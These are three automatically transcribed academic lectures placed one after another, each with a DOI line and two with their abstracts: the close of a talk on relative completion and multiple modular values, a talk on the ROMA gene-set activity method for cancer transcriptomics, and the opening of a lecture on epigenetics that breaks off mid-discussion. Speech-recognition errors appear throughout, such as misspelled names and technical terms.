theorem generates and the quasi-periods. And the example to think of is for example if you have an elliptic curve, you have the periods where you integrate over the A and B cycles of dx over y, these are the periods and they're two of them and the Eichler-Schemurrer theorem gives you exactly the two periods in the modular analog but as we know from an elliptic curve to get the full matrix of periods you have to consider differential forms of the second kind and these are called quasi-periods and the Eichler-Schemurrer theorem, so this is the period matrix if you like in a certain basis, the Eichler-Schemurrer theorem is only giving you this column whereas the full-compress nice morphism is a full period matrix and it gives this column as well. And that was the reason for doing this, this work was to sort this out, so in fact it seems to me to be the case that even for the case of this motive here, the Riemann-Gemn cost function, I don't think that the quasi-periods were known or hadn't been computed, at least I couldn't find it in the literature and they're very useful, they turn up in physics and in all sorts of other places. Right, so that's all quite classical in principle. Now I want to talk about relative completion, so far everything is pure motives, it's all abelian, we're talking about co-homology, we're not talking about fundamental groups and so now we're going to make it all non-abelian. And the first technical point that we need is the notion of tangential base point and this notion is due to the line. You map to the H1 and then what's the next step? What do you expect from the fourth line? Well you want to know how to get the four periods from this, we have delta, so you do, you probably this to delta and delta prime, this gives you some thing and then H1 gamma has an action of epsilon which is the Fribinius, so you have epsilon is something like x, y maps to x minus y for example and then you have H1 gamma Vn plus or minus. So you take P plus, so in this weight, in weight 10 you've got an Eisenstein co-cycle, an Eisenstein class and you've got a positive, cast 1 and negative 1 and the image under S is, you can find a representative as a co-cycle which is the well known and it's x to the 10 minus y to the 10, 36 over 691 over 36 plus 3, I don't know, I'm making this up, x squared minus y is good, yeah, whatever. You've got a 2 by 2 matrix here. But also for the Eisenstein case, I mean to, you actually get a canonical co-cycle in the Eisenstein case, I'll talk about that next time and to make, to get it canonical you need a tangential base point. So there are a lot of very basic things here that are sort of not in the literature but that can be made canonical and very explicit and we'll need them. So if you look at the period of the Eisenstein series you're going to get a zeta value which is the period of a mixed motive, that's very interesting, but if you look at the periods of the cast forms we're going to get exactly these four numbers, the periods and the quasi-periods. So for Eisenstein you've got one, one, one, one, one. So for the Eisenstein series we get two powers of 2 pi i and an odd zeta value. And then 2 pi 2 pi 2 pi. Sorry, how do you mean? No, there's one, there's one integral because, because the Eisenstein part is, is either plus or minus invariant I can't remember, it's, it's, there's only one eigen space. It's one by one. So this, this splits into cusp and then there's h1 Eisenstein gamma vn which I think is, is anti-invariant or something. This is one dimensional, this is two dimensional. And, and there are a lot of things in written in the literature about these Eisenstein classes that are not, that are very confusing. So maybe next time I'll, I'll say some more about these periods and then explain how you get the non-Ambient periods after. Yeah, exactly. You're taking, you're taking this column and the complex, and the complex conjugate of this column here. You're getting two copies of the same thing and you're just taking the complex conjugate. So it's absolutely, I mean we do write this all the time but it's absolutely not, it's not the right, well it's not the, not the statement that we want. Okay, so I have half an hour, tenorical base points. So I maybe have to abbreviate a little bit. But the idea is the following. If we take c bar, a smooth complex curve and we take a point p and c bar. And what we're really interested in is the complement. So we've got a curve in which we remove a point. And the whole idea of this is that you want to take a base point at the point p which you're not allowed to do because you removed it. So the idea for getting around that is, so how do you define a base point at a point that's not in the space? Well you don't, you take a tangential base point. At p is simply a non-zero vector. So it's convenient to write it with an arrow to emphasize it's a vector in the tangent space of the compact, the, the, the sort of the filled in curve c bar which is non-zero. So we think that we have the point p that we've removed and we have some tangent vector sticking out of it. And the point is that this, this perfectly well plays the role of a base point in, in every setting that we care to think about. And it will define fiber functors on various categories of local systems or algebraic vector models and so on. So since I'm slightly short of time, I'll just explain how you can define a notion of fundamental group and then, and then explain the tangential base point that we're using and the rest of the discussion I will postpone till when I look at periods. So what is, what is a path? A path from this tangent vector to another point in the curve is the data of a continuous map into the curve which is continuous but also differentiable at zero such that almost the entirety of the, the, the interval, except the initial point is actually contained in the open in the complement c bar minus p. So let's call this c. And the initial point is p and we specify that the initial velocity of this path should be given by the tangent vector v. And the end point is y. So you think of this in the obvious way. You've got point p here with a vector sticking out and point here at y. And so a path from this tangent vector to y is a path that goes from p and goes to y such that the initial velocity of this path is, is given by the vector v. And that's defined. So out of this you can define a notion of homotopy between paths and you can define fundamental group. So there's nothing to stop us in this definition. We can, we can even take y to be a tangential base point and the definition is the same except you, you enter with minus, the final velocity is minus the vector at y. So it's the obvious definition. And so there is a notion of homotopy, homotopy of such paths. So homotopy is a continuous deformation for which preserves the, the, the, the condition of the derivative at the initial and possibly end points. And so then there's a notion of pi one, the topological pi one of c. So this is the space of paths from the tangent, from the tangential base point to y. And likewise there's a notion of even fundamental group of paths based at vp. So a loop based at this tangent vector is what I said. It's a loop that does something and then comes back with a negative in the, in the, with the final velocity minus v bar. Okay, so you can do everything that you normally do with base points with tangential base points. Let me just explain what the tangential base point that will play a role for us will be. So we have the disk, the unit disk is the set of points q and c such that zero less than q, sorry. That's the disk, the open disk, open puncture disk of radius one. And then there's a, an all befold isomorphism of the upper half plane modulo stabilizer of the cuspid infinity is isomorphic rather map q equal e to the two pi i tau to the disk stack quotient by z mod 2z. So this is not the same thing as the actual quotient of d star by z mod 2z. And from this then, so this, this, this group is a subgroup of SL2z. So this overfold has a map to m11. And therefore we get a map from the disk, the actual disk to the overfold quotient and then onto m11. So what is our tangent vector? So d by dq is, which is going to be our base point is the unit tangent vector at zero on the punctured disk. So we have our picture of the punctured disk with zero removed and it's tangent vector sticking out of zero like this. So of course we're here working with a stack to work with tangent, tangential base points. It's the same as usual. We, we work to the, we can pass us some covering and, and view the tangential base points on the covering. So with that said, another way to think about this, or equivalently, on the upper half plane, what does this tangent vector d by dq correspond to? It corresponds to, so if I draw a picture of the upper half plane here with the real axis and the imaginary axis here, and then that sort of, let's put the cusp infinity up here, then this tangent vector corresponds to a tangent vector sticking down like this. And so sometimes I call this one at infinity. So it's a unit tangent vector in, in, in the coordinate queue at infinity and some people write this d by dq. So either way we have, there's a canonical tangent vector which is going to give us our tangential base point and there are two different notations for it. So this also defines, this fiber functions on various categories of geometric objects on M11. So let me write Vn is, it's the same Vn as before, is the betty local system we defined earlier. We can take its fiber at d by dq at this tangent vector and it's the vector space I wrote down earlier and likewise with Dirac, I'm going to call this Vn Dirac. So in, in the betty case I, I don't, I don't put a superscript, I just drop it. Right, so long last now we can talk about relative completion on the space M11. So of course a lot of what I say is completely general but we're really only interested in this particular space. So the category of local systems of finite dimensional q vector spaces on M11 and is equivalent via the functor d by dq. So we take the fiber at d by dq. I didn't completely explain how to do that but I'll do that next time. And that gives you a finite dimensional q vector space plus a gamma action on some equivalence of categories. And so what we're getting then is a map. So if we apply this to V1 betty, so this is just the, the, the local system of the cohomology of the universal elliptic curve, fundamental building block, then what this is going to get is a, it's going to give us a vector space with a gamma action. In other words we get a map from M11, the fundamental group with respect to the, this tangential base point and it's going to act on, act on the fiber of V at d by dq. And so this is a map row and what we get then is a map row from gamma which is SL2Z into SL2Q. We get an explicit representation of SL2Z with respect to this basis X and Y. Okay so that's the, if you recall from last time, relative completion involved a homomorphism from a group into the rational points of an algebraic group and that's what it is. Oh I've got a board here, sorry. So, so this is the initial data for taking relative completion. Now to define the betty relative completion, we're going to define a category, let me call it just curly C, whose objects are more general local systems on M11 and equipped with a filtration, a finite exhaustive increasing filtration of sub-local systems. So 0 equals L0 containing L1 up to the whole space such that the successive quotients are the ones that we know and love. So, each successive quotient is just a direct sum of the canonical ones that we defined at the beginning. So these are the mth symmetric power, I remind you, is the mth symmetric power of essentially H1 of A. So, I call it H I think. Right, so these local systems are iterated extensions of these building blocks. So the semisimplification is a direct sum of these symmetric powers. But we're going to look at successive non-trivial extensions between these local systems. So this is a Tanakin category and it has a fiber functor omega d by dq which is take the fiber of such a local system at our base point and that gives a map to an exact tensor functor to vector spaces over q. And then therefore from this we define g, the better your relative completion. So now the notation is going to be g11 because this 11 means that we're looking at m11. And this is defined to be the automorphisms of this fiber functor. So this is the better your relative completion and it's an affine group scheme over q. So very concretely it means that its affine ring is just a commutative topf algebra over q. And by the Tanaka theorem this category c is exactly equivalent to the category of representations of this group. So it's extremely clear in fact it's the same group as the one I defined last time. So we can see that because we have a functor, in fact we have this equivalence of categories from local systems to representations. So there's a functor from this category c to gamma representations which is take the fiber at d by dq but by contrast with the previous functor we don't forget the gamma action. So before we had a fiber functor that just gave a vector space that factors through this functor which to see the category c associates the corresponding representation of the fundamental group. Well that's action at the fibered infinity. And that induces in fact is completely obvious from the definition if you translate everything back into representations you get exactly the definition I gave last time. And hence we get a map from gamma rho. So this was the relative completion of SL2z relative to the representation rho that I defined last time. And it's going to be canonically isomorphic to this Beti relative completion. So this is just another way to say that the Beti relative completion is simply for group theoretic relative completion. Exactly the same thing. But what we've gained is this geometric interpretation gives us more information. And therefore as I explained last time the action of gamma here acts on the fiber functor back there and therefore gives an automorphism. And so we have a canonical map from SL2z into this group into the rational points and it's Zariski dense. So we've got some huge affine group scheme, some huge projective limit of algebraic groups and sitting inside it densely is the group SL2z itself. And this is the main tool we have for understanding the Beti side of things is that it's some algebraic whole of SL2z. So now for the Durand relative completion of ten minutes. Okay. So now we define in the analogous way a category A of algebraic vector bundles on M11. So I remind you that we can think of this as graded or algebraic vector bundles on M1 vector one scheme with a GM action with integrable connection and regular singularities at infinity, I get the cusp, equipped with a filtration, so it's the same definition really, 0v0v1vnv, so this is v. So the filtration by sub algebraic sub bundles equipped with an integrable connection, et cetera, et cetera, et cetera, don't want to repeat everything, such that the successive quotients are isomorphic to a direct sum of the em symmetric powers of the Gauss-Mannien connection on the cohomology of the universal elliptic curve. Again, so these are basic building blocks and we're looking at connections which are iterated extensions of such things, all possible iterated extensions. And this has a fiber functor and given by the time potential base point at the cusp and we define the Durand relative completion to be the automorphisms, tens automorphisms of this category with respect to the fiber functor, fibric d by dq. So this is called the Durand relative completion and again it's a group, it's an affine group scheme over q. So actually we'll keep that. So as I mentioned last time these groups have unipotent radicals which are pro-unipotent algebraic groups. So sometimes it's convenient to write, so we write the unipotent radicals as u and these SL2s are not the same. I mean there's nice morphism between them but it's non-trivial so it's convenient to denote these copies of SL2 with different superscripts, SL2, Betting, SL2, Durand. It saves a lot of confusion. So now our proposition is that there is a canonical isomorphism between these two group schemes. So comparison. So over, when you extend skaters to complex numbers these groups become isomorphic, canonically. And this comparison involves integration so it will produce lots of periods and these periods are very interesting and they will be what I like to call multiple modular values. So the proof of this, I'm out of time so I'll just say it's kind of clear it's just the Riemann-Hilbert correspondence between local systems, Delene's version of the Riemann-Hilbert correspondence and algebraic vector bundles and you just need to check something on the x groups. So use the fact that x1, c, v, and betty is h1, m1 analytic, vn betty and in the category, in the Durand category A, the extensions of the trivial object by Durand, again by the Durand. And clearly the Riemann-Hilbert correspondence induces the comparison isomorphism here, which is an isomorphism. That was the theorem that was written down earlier and you can check that this is actually enough because this group is actually, the underlying Lie algebra is free. So if you have a map between unipotent groups whose Lie algebra is a free Lie algebra and which is an isomorphism on generators then it's an isomorphism. So that's very easy to show that. So that was a very heavy handed proof but. So what is the structure of these groups? Well I mentioned this briefly at the end of the last lecture. So we can compute the cohomology of the unipotent radicals. So the cohomology of the unipotent radical and the betty thing is the direct sum h1 gamma vn tensor vn dual. Well mind you that vn is this vector space of the imaginary n plus 1. It should be thought of as the fiber at d by dq of this local system. And similarly for the Durand it's h1, it's the algebraic Durand cohomology tensed with vn Durand dual. Well vn Durand is the fiber at d by dq. Okay and there's no higher h2, no higher cohomology. So as we've seen these by Eichler-Schimmer or whatever the comparison isomorphism, these things are built out of group co-cycles, these things are built out of modular forms essentially. So what this relative completion is, it's SL2 some sort of trivial piece and some huge pro algebraic pro unipotent part that is built out of modular forms. So let me and so then therefore we should think of this comparison isomorphism is we should think of it as a non-Abelian generalization of the generalization of Eichler-Schimmer isomorphism. Right. So another way to set is that the Abelianization of this group gives back exactly, so if you restrict this to unipotent radicals and pass to the Abelian, just the Abelianization which is very small, then you get back exactly with the comparison isomorphism I wrote down earlier. So in the very last minute then let me write down the Lie algebra then. So u11 Durand is something very concrete, it's the Lie algebra of this unipotent group and pro unipotent group is always isomorphic as a vector space to its Lie algebra. So from this description we know that its homology in other words its generators is isomorphic to the product of this algebraic Durand homology dual tensor Vn Durand. So what it is therefore because the Heierko homology vanishes, this is a Freely algebra and so it's the completion of a Freely algebra on generators given by classes here. Let me just write them down and stop and next time explain how you can put a mix of structure on this. So the Lie algebra is has the following generators it has we can denote them by symbols you're going to get an Eisenstein part of the algebraic Durand homology and it's going to come with a copy of this vector space Vn. So this is an SL2 representation, SL2 is the quotient SL2. This is an SL2 representation indexed by an Eisenstein series. So E is some symbol which represents Eisenstein series G2n plus 2 of weight sorry G so n is going to be even, 2n plus 2. So we get Eisenstein series given generators but we also get generators from cuss forms and because the cuss forms occur with multiplicity 2 we're going to get, we can take a basis like I had as basis delta and delta prime earlier, we can choose a basis EF prime and EF double prime. So for every cuss form we get 2, I don't want to talk about cuss form because I'm working on a Q for now. For every cuss form we get 2 generators in cuss form with a choice of Q basis of cuss forms of weight 2n plus 2. So that's it. So in this Lie algebra you have the simple generators corresponding exactly to the classical theory of modular forms and then the next interesting thing that's going to happen is that you're going to get Lie brackets of two such guys and they're going to give periods and they're going to give objects and that's what I mean by the non-Abelian theory of modular forms. I'll stop there. Thank you.
|
In the `Esquisse d'un programme', Grothendieck proposed studying the action of the absolute Galois group upon the system of profinite fundamental groups of moduli spaces of curves of genus g with n marked points. Around 1990, Ihara, Drinfeld and Deligne independently initiated the study of the unipotent completion of the fundamental group of the projective line with 3 points. It is now known to be motivic by Deligne-Goncharov and generates the category of mixed Tate motives over the integers. It is closely related to many classical objects such as polylogarithms and multiple zeta values, and has a wide range of applications from number theory to physics. In the first, geometric, half of this lecture series I will explain how to extend this theory to genus one (which generates the theory in all higher genera). The unipotent fundamental groupoid must be replaced with a notion of relative completion, studied by Hain, which defines an extremely rich system of mixed Hodge structures built out of modular forms. It is closely related to Manin's iterated Eichler integrals, the universal mixed elliptic motives of Hain and Matsumoto, and the elliptic polylogarithms of Beilinson and Levin. The question that I wish to confront is whether relative completion stands a chance of generating all mixed modular motives or not. This is equivalent to studying the action of a `motivic' Galois group upon it, and the question of geometrically constructing all generalised Rankin-Selberg extensions. In the second, elementary, half of these lectures, which will be mostly independent from the first, I will explain how the relative completion has a realisation in a new class of non-holomorphic modular forms which correspond in a certain sense to mixed motives. These functions are elementary power series in $q$ and $\overline{q}$ and $\log |q|$ whose coefficients are periods. They are closely related to the theory of modular graph functions in string theory and also intersect with the theory of mock modular forms.
|
10.5446/50879 (DOI)
|
So thank you for the opportunity to present this work today. I work in the group of cancer systems biology at Curie Institute and my talk is related to the previous one because we are also developing methods to analyze molecular profiles for cancer patients mainly and we are struggling with this molecular profile and trying to understand again how these different patients respond in very different ways to the same treatment or how they are different even if they are the new that in with the same disease and so I will try to discuss our concept of analyze this data this molecular profiles in terms of a gene set because now we are not only analyzing measuring five or six markers but real the in this time we are measuring thousands of genes and a transcriptomic or proteomic experiments contains the measure of five thousands or ten thousands genes so we really need to simplify all this data to understand how if they tend they can tell us something about the disease and and the patient so this concept of a gene set is becoming a more and more popular in analyzing data molecular profiles because comparing different patients with the same disease we are understanding more and more that the same patient and the same pathway can be affected in different individuals in different ways meaning that the same a senaline can be affected in one patient maybe at the at the membrane level in another patient the same pathway can be affected on another molecule more downstream in the senaline and so the same senaline is affected but these these samples are more comparable at the pathway level rather than at the single gene level this is why these gene set approaches are becoming more and more used to trying to dissect this type of data this was an example where we have this cohort of colon colorectal cancer patients and we know from previous models and from previous analysis in in in mouse models that the notch senaline is affected and in a different way between invasive and non-invasive tumors so we have we want to verify in the human samples what is happening thanks to these very large projects called the cancer genome atlas where you are access to public data on very large cohorts of patients this is an international effort and so we go to the data of colorectal cancer in these very large cohort of hundreds of samples and we divide according to clinical data our core team two groups metastatic and non-metastatic simply on the appearance of metastasis in these two two groups and we check for expression of genes involved in the notch senaline for these two groups and we observe for many genes that are known to be involved in notch senaline that there were no big difference at the single gene level in the culture in the cancer culture in the gene cell from there or its health results they are biopsies in this yeah exactly this is the cancer sample right and so again at the single gene of notch senaline we were not able to detect any difference in this in this senaline so we try to develop a method that can catch information at the gene set level to understand how notch senaline is active or inactive in each sample and the idea of gene set needs that we need to define some groups of genes that are considered to be to have a coordinated coordinated expression so this can be for instance targets of common transcription factors for instance some downstream targets or genes that are involved in the same senaline process so there are many different ways we can define these sets and then as soon as we define these sets now we can quantify the activity of the whole set and again there is also another big assumption in our method that is based on the unifacto linear model meaning that we but of course this can be expanded and developed in a more complicated way but the first approximation in our model is that the genes in the same set of genes are under the influence of a one main factor that can be an oncogenic event or can be a drug perturbation but we need to do this assumption and if we are able to do this assumption then we can approximate and rewrite the matrix of gene expression for all the genes in our set as the product of two or two vectors so the first vector is the first metagenes so the first principal component of the expression of the set of genes and the second vector give us the level of these metagenes in different samples so what happens is simply that the big matrix of many genes is now approximated by these two vectors the vectors of coefficients that give us the metagenes and the weight so the level of these metagenes in our samples and this model allow us to identify what is a novel dispersed gene set and this is a concept already presented in some recent literature where we try to define which gene set in our according to our conditions express a high variance an excess of variance compares to the background so meaning that if we test many different gene sets on our data there are some that show high variability compared to the background random gene set and so we consider that these sets are particularly active or inactive in our conditions and so of course we have to define this background expectation and if we have this we can identify these active or inactive the sets all these is implemented in a computational way that allow us to do it automatic for many pathways and maybe if we don't have any a priori knowledge we can test a complete base database of pathways that are now available so if we have the expression data that so this big matrix with the 10,000 genes measured in many conditions and we have this definition of sets of pathways or we want to define we can run these analysis and at the end have these coefficients of over dispersion meaning for each gene set how we expected these to be over dispersed in our data according to the level of this metagen in our samples so there are some features that we try to introduce because of course statistically we need to do to take in account some facts for instance that a very small gene set is so the likelihood to have these variants quite it's quite probable to have these variants by chance and so the these L1 variants really depends on the set of the size of the set and so we we should avoid that to have this very small set or it or to take it in consideration and we do it by assess the new distribution by keeping random sets of genes with the same size and testing the variants of these random sets if the typically for small sets we the random the random sets are the same variants as the as they say the one we are testing another thing that we take into account is also that we can have different patterns of over dispersion so we have some genes that contribute we can have some genes that contribute positively or negatively to the variants of this set but we have some cases in which all genes are contributing in the same in the same direction like in this fact imagine a transcription factor that we don't know why but here is only an activator and all the star gets are over expressed in in this set so in our case we are able also to detect this type of pattern of this type of pattern and also if we have already a biological a priori knowledge and we know says that some genes is are active or in active we can introduce these fixing some weights in the measurements that say to keep it into account our a priori knowledge on the on the on some pathways and the last one thing is also that sometimes the first principal component is affected by outliers so very special gene in the set that behaves very particularly and so typically we also we would like to avoid because in some cases are very important marker in the pathway so it can be interesting thing but in many cases is a noise in the measurements so we should avoid the two to have results really too much on this type of on this type of results and so we do some applications I will show you at least two I hope you have time so the first one is this notch senaline in the in the colorectal cancer as we know this a single expression is not particularly informative but now if we measure the notch and we include also some other pathways that were informative for us wind and p53 in our analysis these are the results of our gene set quantification so here is for each point we have is a sample and the is the level here is the note is the score of our aroma tool for the notch senaline in this sample so we can see that for aggressive tumors the red ones we have at least one one group of tumors where this is not seem to really active while in the non-aggressive tumors the situation is more distributed and for p53s was really clear so we are we are we have lost p53c targets in these patients compared to the other group and wind also was a significant result because seem to be quite active in the invasive tumors rather than in the non-invasive ones and so this was to an example to measure these data in terms of gene sets one other application we are doing more and more type application of these data in the is in analyzing transcriptomic data in checking the consistencies between the transcriptomic data in a mathematical model of metastasis that was developed in our group in this diagram this is a typical diagram showing a Boolean model of invasiveness so what does it mean that we have some nodes that are connected by edges that can be active or inactive and we try to model the process in terms of logical rules that can according to some initial conditions evolves towards different phenotypes okay this is the biological is the know what is what is known about some process in some more signaling that is involved in invasiveness and now these components are connected to work some example specifically what and not what information goes on okay another another year is a model clinical information it's not clinical information this is biological information meaning that we know in literature and in biological information that for instance a kitty a kitty one or a kitty two are involved in the process of invasiveness now we put all the components together and we try to connect them according to inhibitory or activity influence and then we give we give logical rules to evolve from initial conditions until towards phenotypes so to towards observables this is the process of logical modeling but again this was done many my colleagues so but again I can try to explain how it works but what we have done is now okay we have these components but we would like also to to see if these molecular profiles that are measured in in our data fit with these components if what we accept to be active is really expressing our data if what is expected to be inactive is down and if we do again by gene by gene we don't see this big difference so again we try to connect to each node in this model a set of genes instead one single one this is meaning that the 40 gf beta for instance we try to measure the level of to by roma the tgf beta targets and the same for the other components of the of the of the network and this seems to be to give a more consistent result meaning that again some things that are expected to be inactive in the non-metastatic group becomes active in the metastatic one etc and this again was not possible to observe at the individual gene level and I have five more minutes to present the final one okay let's skip the third example but again all these tools are valuable if can be of interest for other type of applications and this is the working group in that are collaborating to this project many of them and cancer systems biology group and the week but I now is in cancer cancer all and let's see thank you thank you yes yeah I'm not sure why you do this because it's relevant with respect to the approach and interpretation of the data in practice now you find for instance the winged gene set is changed in a significant way and what does that mean it means to win is in cancer but it might be that it's part the wind set gene set is part of a larger gene set and essentially driven by the other components of the larger gene set and so it might be that it's only a passenger or the larger change that's what really counts with cancer so in the book you can't draw conclusions about the relevance of the changes in this gene set simply from this data without the context yeah the assumption as I said is this unifactor model and as soon as you are not apply these methods to a cancer data set you assume that the main driver driver event is an oncogenic event so this is what really gives the data the variance so of course if you analyze if you think that may the main factor driving the variance of your data is someone else so you conclusions about the cancer process are of course discussed but those predictive level of your data so how much you can predict actually from from your data from molecular data predict the development of cancer or the efficiency of the method everything else suggests who cares this is the only thing you want to get there yeah now this is a step let's say a big step is that we are able to discriminate between different risk groups in our in our patients and so is the aim the big aim is now to be able to predict how how some pay how some tumors will be more aggressive than other ones in some projects we are now able to at least identify clearly different groups that were not identified before so these were at least is a first step because now we are able to discriminate these kind of clusters of some of patients that were not identified before not complete because then when you analyze some for instance you go inside some markers and now you are able to see that really these markers these signaling is indeed different between the groups that were not identified before so you are putting evidence some components of the product the process that were not identified before could you expand why you focus in expression levels if I understood correctly as opposed to regulations for the pathway for correlations right the main thing is that the previous type of data mainly was the transcriptional level but the same methods are now applied to proteomics and phosphoproteomics data the fact is the fact is that transcriptomic level was the first one where we were able to to measure thousands of so to have these genome-wide experiments but now for cancer patients it's become reality also to have the proteomic level and so we are more and more applying to other level of molecular my question is I mean there are marginal differences on the expression levels right but if you will go for regulation you actually tested it already which type of regulation for instance in phosphoproteomics data what we are able to identify to analyze sets of substrate for a certain kinase we are able to identify some kinases that are active or inactive in some genes in some samples so still was we were able to analyze these data and interpret them in terms of active or inactive kinase or phosphatase so those are stronger predictions in again the the fact is that we are able to clearly identify different phospho different groups that behaves differently in the phosphoproteomic analysis how we are predicting is we are not yet we are not able now to say how good is in predictor because we know we should have a kind of a patients where we're with a certain follow-up etc it's a bit we are not yet able to do predictive models but we are able to at least identify groups of different patients so I just want to say that to defend the Roma and Lavender these are programs that they develop I understand I'm not a bioinformatics person they develop for the use of our community they're trying to talk to us and it will be used always go to Roma yes so there will be other ways that you can use Roma that's what you're gonna say yes right yeah and I wanted to say the goal is not to understand biological processes but to probably do some diagnostic or prediction so that's why she's trying to get this adverse separation between the groups so that it will be predicting of metastasis okay thank you very much
|
In many analysis of high-throughput data in systems biology, there is a need to quantify the activity of a set of genes in individual samples. In cancer the same pathway can be affected by defects in different individual genes in different patients and application of gene set approaches in the analysis of genomic data can help to capture biological information that is otherwise undetectable by focusing on individual genes. We present here ROMA (Representation and quantification Of Module Activities) software, designed for fast and robust computation of the activity of gene sets (or modules) with coordinated expression. ROMA activity quantification is based on the simplest uni-factor linear model of gene regulation that approximates the expression data of the gene set by its first principal component.The proposed algorithm implements novel functionalities: it allows to identify which genes contribute mainly to the activity of the module; it provides several alternative methods for principal components computation, including weighted and centered versions of principal component analysis; it distinguishes overdispersed modules (based on the variance explained by the firts principal component) and coordinated modules (based on the significance of the spectral gap); finally, it computes statistical significance of the estimated module overdispersion. ROMA can be applied in many contexts, from estimating differential activities of transcriptional factors to finding overdispersed pathways in single-cell transcriptomics data. We present here the principles of ROMA providing a practical example of its use. We applied it to compare distinct subtypes of medulloblastoma disease in terms of activated/inactivated signalling pathways and transcritpional programs.
|
10.5446/50882 (DOI)
|
So I've changed a little bit the title actually. I've added, oh, non-coding RNAs in the story. So we'll start with a general view of what is epigenetics for those of you who don't know, essentially, mathematicians, I guess, are not very familiar with the concept. So let's start with genetics. You, of course, know about Mandelian transmission and genetics. You heard about it this morning. Genetics laws allow a same phenotype with different genotypes. For example, when you have a recessive inheritance of a trait. But genetics, if you take it, basically, does not predict different phenotypes with the same genotype. However, it's been known for a very long time, actually, that there are many cases of identical genotypes and different phenotypes, which says that genetics cannot explain everything. So I'll just give you a few examples of that. For example, the queen of the bees and the workers are generated from identical larvae. But they have very different phenotypes, as you can see here. And as you may know, another example, which is closer to us, is the cells from a single organism. All the cells from a complex organism come from a single cell. They have an identical genotype, as far as we can say. But they come from the same cells originally. And then they become quite different when we are with an embryo. And you have completely different cells, brain, muscle, guts. All these cells have the same genotype. But they have different phenotypes. So the question, which has actually been on for a long time, but it's solved now, is how these cells can have the same genotype, but completely different phenotype. And the answer comes from epigenetics. Now, the modern definition of epigenetics is the analysis of stable and reversible changes in gene expression that do not involve modification of genetic information. And how can this happen at the molecular level? So you know that genetic information is burned by DNA. And it's located in the cell nucleus, in blue here in this picture. But DNA is not naked. In fact, in a human cell nucleus, which has about 10 micrometer of diameter, there is about 2 meters of DNA. So these very small nucleus cannot accommodate these two meters of DNA without compaction. And in fact, DNA is compacted in the cells. I apologize for the resolution, which comes from the change of computer, I guess. So you have the naked form of the DNA, and then several degrees of compaction up to the most compacted form, which is the mitotic chromosome. Now, this compaction, in fact, is due to proteins, which are called the histone. So you have several of them. We are not going to go into the details here. But you have two rounds of DNA, which is wrapped around the core of histone proteins and with a regular disposition. So these are called the nucleosomes. And the nucleosomes, so this is the chain of nucleosomes, and then this chain can be compacted. And then the new chain is compacted again. And so you have different level of compaction. Now, the problem is that compacted chromatin, in the compacted chromatin, the DNA is not accessible for proteic cellular machineries. So that, and if you want to express a gene, you have to have access to the DNA, to the RNA transcription machineries, the RNA synthesizing machinery, so that, in fact, compacted chromatin is linked to inactive gene. And open chromatin, decompacted chromatin, are potentially active genes. And indeed, if you look at the cell nucleus, you have different degree of compaction that you can even see by electronic microscopy. And you can distinguish what is called eukromatin, which is little compacted and which includes active genes, from heterochromatin, which is highly compact and which includes inactive genes. Now, chromatin compaction is controlled by chemical modifications of the chromatin. The DNA can be modified. It's methylated. And the histones, the proteins on which it is wrapped, can also be modified. They have little tails protruding out of the nucleosome, which can be either acetylated, methylated, phosphorylated. And you have all sorts of different combinations of all these modifications of the histone tails. So that, and these modifications, these combinations of modifications are specific of the different type of chromatins. In heterochromatin, the highly compacted chromatin, inactive chromatin, DNA is methylated, histones are deacetylated. And you have methylation on certain residues of the histone tail, for example, as we can find. In contrast, when chromatin is active, in eukromatin, you have de-methylated DNA. Histones are acetylated, and they are methylated along all the residues, such as H3K4, for example. You can actually measure at the whole genome level these modifications, one by one. And this will give you the epigenome of the cell. Now, if you take the genome as a book, the epigenome will tell you which are the open pages. It's the epigenetic marks, which will select the open pages of the book. So this, if you want, is the eukromatin. You can read it. This is the heterochromatin. You cannot read it. So if we come back to the question of the cells which come from a single cell and have an identical phenotype, actually the difference is, at least in large part, due to the epigenome, because their epigenome is different. So if you take a stem cell, for example, you will have the genes A, B, and C, which are methylated, et cetera, and compacted. Whereas if you take its daughter cell, other genes will be methylated, compacted, et cetera. So the pattern of genes which are open and the pattern of genes which are closed are different between these two cells. So the main question appears to be solved. We know what make a different phenotype from a single genotype. But there are other open questions. One of the questions which is very important, actually, is, can epigenome be modified by external signal? It's a socially important question, because it includes the relationship between the genome and the environment. And you know all these problems created by the environment. Well, we know that external signals can modify the epigenome. Like you have a ligand, for example, which will bind to a receptor, activates a chain of transduction, and eventually will change the chromatin very locally at very specific loci from compacted to open, and will activate the gene. At a more organism level, if we come back to the B model, it's, in fact, an external signal, which is the royal nectar with which the queen is fed, which makes the whole difference between the worker and the queen. It is the fact that the queen is fed with this type of food, which modifies the epigenome of the larvae, and makes a queen. And it has been proven that some genes are methylated in the absence of royal nectar, and this will give a worker, whereas all the genes will be activated by the royal nectar. And these genes control the size of a reactivity, et cetera, of the future bee. In mammalians also, we have many examples of effect of an external signal on the epigenome. Here, for example, is the example of the dismyse, which are born from a stressed mother. So when the mouse is pregnant, you stress it by noise, different noises, or stuff like that. Now, the mouse, which are born from a mother or a stress during pregnancy, are themselves stressed, whereas the mouse, which is born from a well-treated mother, is not stressed. And it has been linked to the methylation of the gene, which is a gene which is expressed in the neurons, and which actually defects is associated with schizophrenia. And the mouse born from the stressed mother, this gene is methylated, whereas in the mouse born from a well-treated mother, the gene is not methylated. So it's expressed. So this clear environment, nutrition, external conditions affect the epigenome. Now, another very important question, and this one is not solved at all, is can epigenome modifications be transmitted to the next generations? Now, if we take a somatic cell, like for example, we have a culture, let's say fibroblasts. So differentiated cells. Then all the daughter cells of this fibroblast will be fibroblasts, which clearly indicates that the epigenome is transmitted from the mother cell to the daughter cells. Despite the fact, and I think it's a very interesting question actually, that during the mitosis, the chromosomes are highly condensed. It's the most condensed form of the chromosome. And despite this fact, they keep, they maintain this information. And actually, we don't know how. But now, if we take not the somatic cells, but the germ cells, is the epigenome transmitted to the descendants, where there are actually numerous studies in mouse and human, suggesting that it might be the case. And if we go back to the stressed mice, actually, the mice which are born from stressed mothers, they are stressed. But they also have a good probability of giving themselves birth to stressed descendants. Raising the possibility that this epigenomic status of feature has been transmitted. And there are numerous studies like that in the literature. However, this is a very controversial issue. As actually, these experiments are very difficult to interpret. Is the effect due to molecular transmission of the epigenome to the embryo in the germ cells? Or is it due to cultural factors and behavioral transmission? The stressed mother is stressed. She deals with, or it deals, if it's a mouse, with her infants in a very specific way. With a body factor, it's stressed, or they're a particular hormone. Exactly. It can be. Stress is chemical, don't you? The stress is chemical. But the way the children receive the stress, it will induce a chemical reaction in them as well. But it's a transmission is. What's an embryo? We're receiving this hormone. And who cares what you're receiving afterwards? Embryo in development was chemically modified? Yes. But if it gives birth, if it gives birth, the same embryo will give birth. 